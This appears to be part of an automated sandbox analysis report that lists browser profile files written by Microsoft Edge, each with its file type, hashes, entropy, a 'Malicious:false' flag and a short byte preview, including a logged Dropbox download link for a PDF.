                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                                                                                                  Entropy (8bit):1.264935646822484
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:384:8/2qOB1nxCkMPSAELyKOMq+8yC8F/YfU5m+OlTLVumr:Bq+n0JP9ELyKOMq+8y9/Ow8
                                                                                                                                                                                                                                                                  MD5:06C8E32FC3FAF97329049DE2B9A2F360
                                                                                                                                                                                                                                                                  SHA1:D33051994E2C57BC0767ADC9230B01494A625FCF
                                                                                                                                                                                                                                                                  SHA-256:42C5922847EFD30480212894AD22A81F80FCA39B2E564CEF1B1151FD54C5AB65
                                                                                                                                                                                                                                                                  SHA-512:7BCAD5FC9720D74E34FF1167636D174F5F3C9E13296CE84160EBD65955806DC17F4295C8A1874C0D508D427871D3E3E43283592CC5339FD4FA807F9E2CB13D8C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data-journal

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2568
                                                                                                                                                                                                                                                                  Entropy (8bit):0.06569804787746028
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Ol1l3/Plq:u/8
                                                                                                                                                                                                                                                                  MD5:9304D7855AB15FFBF1B5F690150CA1B8
                                                                                                                                                                                                                                                                  SHA1:8B7BC786A1837D57D7F8E775286DED38B7497B26
                                                                                                                                                                                                                                                                  SHA-256:C3A9B1D5BC10F79D18AEBB3FA5D3A87E83AD6556F5FB33CA5E9D606C16AFF254
                                                                                                                                                                                                                                                                  SHA-512:7E51AE613E21ADC7B6513B7FC647BF9DC3530E4033378E0A420F1A9A2BE64E1E24043D98BF381D705AB9B84AC91D2887BD2355C392065EFB29D0037FF4064C75
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:...................`.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                                                                                                  Entropy (8bit):0.41235120905181716
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB:v7doKsKuKZKlZNmu46yjx
                                                                                                                                                                                                                                                                  MD5:981F351994975A68A0DD3ECE5E889FD0
                                                                                                                                                                                                                                                                  SHA1:080D3386290A14A68FCE07709A572AF98097C52D
                                                                                                                                                                                                                                                                  SHA-256:3F0C0B2460E0AA2A94E0BF79C8944F2F4835D2701249B34A13FD200F7E5316D7
                                                                                                                                                                                                                                                                  SHA-512:C5930797C46EEC25D356BAEB6CFE37E9F462DEE2AE8866343B2C382DBAD45C1544EF720D520C4407F56874596B31EFD6822B58A9D3DAE6F85E47FF802DBAA20B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):11755
                                                                                                                                                                                                                                                                  Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                  MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                  SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                  SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                  SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\d8b649de-9f54-424d-8644-fd815ff7a60a.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                                                                  Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                  MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                  SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                  SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                  SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                  Entropy (8bit):0.061378668235628084
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:Gy0H3kWsI0H3kWzp89XCChslotGLNl0ml/Vl/Vl/U8oQXmlXCUWls:C0Wsh0WzpspEjVl/PnvoQW1
                                                                                                                                                                                                                                                                  MD5:1A33C039C315306CA678891D2ADBD6DE
                                                                                                                                                                                                                                                                  SHA1:558A825C8CCA325F03054126AE23964C33BE8422
                                                                                                                                                                                                                                                                  SHA-256:05EC7F82C99E88A40B577A2F50A6136C6DD5BAC4CD1B5BAB7DE870519E9C2D97
                                                                                                                                                                                                                                                                  SHA-512:F816A76C3C44CBD1CDD4DC2528202725DD68896E16581FAF252177C6015A40F111879E289FCC7AB9F0A0F91AA3C5594DEA96009D42BEE978E792797DE6CF18FC
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:..-.......................@.0..3.4..}..:....$K...-.......................@.0..3.4..}..:....$K.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):119512
                                                                                                                                                                                                                                                                  Entropy (8bit):0.7428393956694356
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:jjx7/02b2dNshTNsOO5NsvlNsEoB2BXjOBgBXKLFIi:jt7/02b2oMqvQEyYkK69
                                                                                                                                                                                                                                                                  MD5:2874C15717FBD33E65A3BDDCBE9723D4
                                                                                                                                                                                                                                                                  SHA1:F1FF508113F134DAA159835A77739A18C78B58E9
                                                                                                                                                                                                                                                                  SHA-256:C3157BEC0466772ED1EC6FCBDD9CE96C45777A6BADD3BC112268629E3BD4F037
                                                                                                                                                                                                                                                                  SHA-512:CC71AC7FE2B66D066EED54F09019CBA5B551A2B4635A3FFD37BFF3FA2DF55053D2282784169C34C83C8989931E80BAAD2AEE8DC87852B75FE381EE879C74BD56
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:7....-...........4..}...8.?L.0.........4..}........C.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):5242
                                                                                                                                                                                                                                                                  Entropy (8bit):5.816840094489451
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:iDc6OIvS/VRF+xiR0jL/VRF+xiq9QFl7CuN/VRF+xiJJhutCuN/VRF+xiJJhuDn:ac6O9kvkt6Tkdkfn
                                                                                                                                                                                                                                                                  MD5:2318530ED11BFF5E46CF583E38B9DDC2
                                                                                                                                                                                                                                                                  SHA1:4F5D58B3727C7E160035B0554687E9A635DE1EC8
                                                                                                                                                                                                                                                                  SHA-256:E68719AE6D8286A7A28FC62922931009CD777090CFA7F0C733AAAC6CABA4ADBA
                                                                                                                                                                                                                                                                  SHA-512:8E2897C82708B47B19F0A90E3A04FF978081FBB88661FB94637BB732F7885F6E2C583772078DF6D2722DE5E9739B95375E94B1C7ADB92E9D86B01469EE8E4B03
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:A..r.................20_1_1...1.,U.................20_1_1...1..}0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............B.;...............#38_h.......6.Z..W.F.....t.).....t.)..........V.e...................<V...............021_download,73cdaea6-1399-4293-b52b-fea2bfbed1e3......$73cdaea6-1399-4293-b52b-fea2bfbed1e3...............".....https://www.dropbox.com/scl/fi/zswwoz1nsshfdhbgdi9dy/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=xb4z4b9qljepnpiu5mkjz888q&dl=1...https://ucface448887177da6d79d4eb2fe.dl.dropboxusercontent.com/cd/0/get/CgidpJ0z5-TTxaxwLV

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                  Entropy (8bit):5.24992393859268
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPSMSQ+q2P923oH+TcwtfrK+IFUt8OoPSMSgZmw+OoPSMSQVkwO923oH+TcwtfR:7gOv4Yeb23FUt8OgX/+OgF5LYeb3J
                                                                                                                                                                                                                                                                  MD5:265323C0A002231FBB01730D715CDA92
                                                                                                                                                                                                                                                                  SHA1:B97023D8F4C60F40C1DB67D04F2D9981C910CAC5
                                                                                                                                                                                                                                                                  SHA-256:857B7841B76EA2332C33EE32922C4DC75979D78A38A6D030A0E09EE35EA99607
                                                                                                                                                                                                                                                                  SHA-512:0044E72F221ED5C939C4AE70C2A6B9DA7B897F0133A520AAB988A9C534B2171AFF3377507B9E0A5E0B4920AC67E76E4E73F4820E94A70004BF2941862FC95067
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:20.056 1d68 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/19-07:44:20.056 1d68 Recovering log #3.2024/12/19-07:44:20.056 1d68 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                  Entropy (8bit):5.24992393859268
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPSMSQ+q2P923oH+TcwtfrK+IFUt8OoPSMSgZmw+OoPSMSQVkwO923oH+TcwtfR:7gOv4Yeb23FUt8OgX/+OgF5LYeb3J
                                                                                                                                                                                                                                                                  MD5:265323C0A002231FBB01730D715CDA92
                                                                                                                                                                                                                                                                  SHA1:B97023D8F4C60F40C1DB67D04F2D9981C910CAC5
                                                                                                                                                                                                                                                                  SHA-256:857B7841B76EA2332C33EE32922C4DC75979D78A38A6D030A0E09EE35EA99607
                                                                                                                                                                                                                                                                  SHA-512:0044E72F221ED5C939C4AE70C2A6B9DA7B897F0133A520AAB988A9C534B2171AFF3377507B9E0A5E0B4920AC67E76E4E73F4820E94A70004BF2941862FC95067
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:20.056 1d68 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/19-07:44:20.056 1d68 Recovering log #3.2024/12/19-07:44:20.056 1d68 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):787
                                                                                                                                                                                                                                                                  Entropy (8bit):4.059252238767438
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhC+lvBOL+t3IvB8s
                                                                                                                                                                                                                                                                  MD5:D8D8899761F621B63AD5ED6DF46D22FE
                                                                                                                                                                                                                                                                  SHA1:23E6A39058AB3C1DEADC0AF2E0FFD0D84BB7F1BE
                                                                                                                                                                                                                                                                  SHA-256:A5E0A78EE981FB767509F26021E1FA3C506F4E86860946CAC1DC4107EB3B3813
                                                                                                                                                                                                                                                                  SHA-512:4F89F556138C0CF24D3D890717EB82067C5269063C84229E93F203A22028782902FA48FB0154F53E06339F2FDBE35A985CE728235EA429D8D157090D25F15A4E
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.......f-.................__global... .|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):342
                                                                                                                                                                                                                                                                  Entropy (8bit):5.226367546103868
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPW8QQ+q2P923oH+TcwtfrzAdIFUt8OoPW8QgZmw+OoPsQQVkwO923oH+Tcwtfa:7sov4Yeb9FUt8Os5/+O1T5LYeb2J
                                                                                                                                                                                                                                                                  MD5:D419A6A33C830FAAB34AB6D78281A3F9
                                                                                                                                                                                                                                                                  SHA1:8A188E872FFBAC4F256DEB59EC3C6780609729E8
                                                                                                                                                                                                                                                                  SHA-256:6BEF30E22CE09F5284AD698163B1E5D3FACDFCBCC41CE33F95F6A33112D348F7
                                                                                                                                                                                                                                                                  SHA-512:C61BA5BBEBAB75175AE1A08E07D0196BA412F4B61FB569E601F6885D254D25688DF6CFDC09E00C5EE0CD13EC93E435E4AE585EBD870F0E9EA4772DDA5BE97FA5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:20.052 1d68 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/19-07:44:20.052 1d68 Recovering log #3.2024/12/19-07:44:20.053 1d68 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):342
                                                                                                                                                                                                                                                                  Entropy (8bit):5.226367546103868
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPW8QQ+q2P923oH+TcwtfrzAdIFUt8OoPW8QgZmw+OoPsQQVkwO923oH+Tcwtfa:7sov4Yeb9FUt8Os5/+O1T5LYeb2J
                                                                                                                                                                                                                                                                  MD5:D419A6A33C830FAAB34AB6D78281A3F9
                                                                                                                                                                                                                                                                  SHA1:8A188E872FFBAC4F256DEB59EC3C6780609729E8
                                                                                                                                                                                                                                                                  SHA-256:6BEF30E22CE09F5284AD698163B1E5D3FACDFCBCC41CE33F95F6A33112D348F7
                                                                                                                                                                                                                                                                  SHA-512:C61BA5BBEBAB75175AE1A08E07D0196BA412F4B61FB569E601F6885D254D25688DF6CFDC09E00C5EE0CD13EC93E435E4AE585EBD870F0E9EA4772DDA5BE97FA5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:20.052 1d68 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/19-07:44:20.052 1d68 Recovering log #3.2024/12/19-07:44:20.053 1d68 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):120
                                                                                                                                                                                                                                                                  Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                  MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                  SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                  SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                  SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                                                                                                                  Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                  MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                  SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                  SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                  SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:117.0.2045.47

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                  Entropy (8bit):6.090752586172201
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBM+wuF9hDO6vP6O+htbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE068tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                  MD5:2822A7749035D391154BCDF384344D3C
                                                                                                                                                                                                                                                                  SHA1:2E4E5FD0505BC9281D7CF6B855ED9916FE0439A0
                                                                                                                                                                                                                                                                  SHA-256:6D38B4537085986B4E320AE42E1AD5A8A6007508D112E9A4EC510F9643E68129
                                                                                                                                                                                                                                                                  SHA-512:16FC4DBFDFC9200D000AF5F9919FF2C06F792254443BC470FD74976A63DC8D4ABE8AF026DF852592D003FBC2449D0E9EB3A842601B38A43F60D486D3F222059D
                                                                                                                                                                                                                                                                  Malicious:false
